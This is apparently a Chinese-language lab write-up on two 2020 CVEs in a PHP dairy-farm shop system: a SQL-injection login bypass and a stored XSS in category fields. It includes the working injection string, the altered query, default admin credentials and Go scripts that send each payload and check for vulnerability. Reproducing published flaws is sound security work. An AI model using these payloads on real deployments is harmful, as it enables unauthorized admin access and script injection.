Dairy Farm Shop Management System Project (DFSMS)
产品介绍
Dairy Farm Shop Management System是一套基于PHP和MySQL的奶牛场管理系统。
系统详情
Language Used :** PHP
Database : MySQL
User Interface Design : HTML, AJAX,JQUERY,JAVASCRIPT
Web Browser : Mozilla, Google Chrome, IE8, OPERA
Software : XAMPP / Wamp / Mamp/ Lamp (anyone)
环境搭建
系统下载:https://phpgurukul.com/?smd_process_download=1&download_id=10924
安装步骤:
下载压缩包文件
解压文件拷贝dfsms文件夹
粘贴到根目录(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)
打开phpmyadmin (http://localhost/phpmyadmin)
创建 dfsms数据库
导入dfsms.sql(given inside the zip package in SQL file folder)
访问 http://localhost/dfsms
默认登录密码
Username: admin
Password: Test@123
能够登录成功说明数据库连接是没有问题的
CVE-2020-5307
漏洞详情
漏洞名:Dairy Farm Shop Management System SQL注入漏洞
类型:sql注入
危险级别:超危
来源:https://www.exploit-db.com/exploits/47846
页面访问
username:admin’ or ‘1’ = ‘1’; – -
**Password:非空任意字符串
成功绕过登录
原理
admin’ or
admin后的引号破坏了之前的查询语句,闭合查询语句,注释了后面的内容,or ‘1’ = ‘1’保证了查询逻辑为真
登录逻辑
原查询语句:select ID from tbladmin where UserName=’$adminuser’ && Password=’$password’
更改为
select ID from tbladmin where UserName=’admin’ or ‘1’ = ‘1’; – -‘ && Password=’a’
成功查询到admin账户的id。
代码实现
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
package main
import (
"fmt"
"io/ioutil"
"net/http"
"strings"
)
func main() {
url := "http://your-ip/dfsms/index.php"
method := "POST"
payload := strings.NewReader(`username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=a&login=`)
client := &http.Client{}
req, err := http.NewRequest(method, url, payload)
if err != nil {
fmt.Println(err)
return
}
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
req.Header.Add("Cookie", "PHPSESSID=ogvk4oricas9oudnb7hb88kgjg")
res, err := client.Do(req)
if err != nil {
fmt.Println(err)
return
}
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
if err != nil {
fmt.Println(err)
return
}
if strings.Contains(string(body), "Add Product") {
fmt.Println("存在CVE-2020-5307漏洞")
} else {
fmt.Println("未检测到CVE-2020-5307漏洞")
}
}
|
github:–>传送门<–
CVE-2020-5308
漏洞详情
漏洞名:PHPGurukul Dairy Farm Shop Management System 跨站脚本漏洞
类型:跨站脚本
危险级别:中危
来源:https://cinzinga.github.io/CVE-2020-5307-5308/
访问http://your-ip/dfsms/add-category.php
测试: category:<script>alert("category")</script>
code:<script>alert("code")</script>
提交
提示添加成功
访问http://your-ip/dfsms/add-category.php
可以看到xss测试已经生效
原理
写入数据库时未对CategoryName和CategoryCode做处理直接写入数据库
显示未作任何处理
代码实现
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
|
package main
import (
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
)
func main() {
url := "http://your-ip/dfsms/add-category.php"
method := "POST"
payload := strings.NewReader(`category=%3Cscript%3Ealert%28%22thisisxssvulntest%22%29%3C%2Fscript%3E&categorycode=test&submit=`)
client := &http.Client {
}
req, err := http.NewRequest(method, url, payload)
if err != nil {
fmt.Println(err)
return
}
req.Header.Add("Cookie", "PHPSESSID=ogvk4oricas9oudnb7hb88kgjg")
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
res, err := client.Do(req)
if err != nil {
fmt.Println(err)
return
}
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
if err != nil {
fmt.Println(err)
return
}
if !strings.Contains(string(body), `Category added successfully.`) {
fmt.Println("未检测到CVE-2020-5308漏洞")
os.Exit(0)
}
url2 := "http://your-ip/dfsms/manage-categories.php"
method2 := "GET"
client2 := &http.Client {
}
req2, err := http.NewRequest(method2, url2, nil)
if err != nil {
fmt.Println(err)
return
}
req2.Header.Add("Cookie", "PHPSESSID=ogvk4oricas9oudnb7hb88kgjg")
res2, err := client2.Do(req2)
if err != nil {
fmt.Println(err)
return
}
defer res2.Body.Close()
body2, err := ioutil.ReadAll(res2.Body)
if err != nil {
fmt.Println(err)
return
}
if strings.Contains(string(body2), `<script>alert("thisisxssvulntest")</script>`) {
fmt.Println("存在CVE-2020-5308漏洞")
} else {
fmt.Println("未检测到CVE-2020-5308漏洞")
}
}
|
github:–>传送门<–
参考链接:
https://cinzinga.com/CVE-2020-5307-5308/
https://www.exploit-db.com/exploits/47846
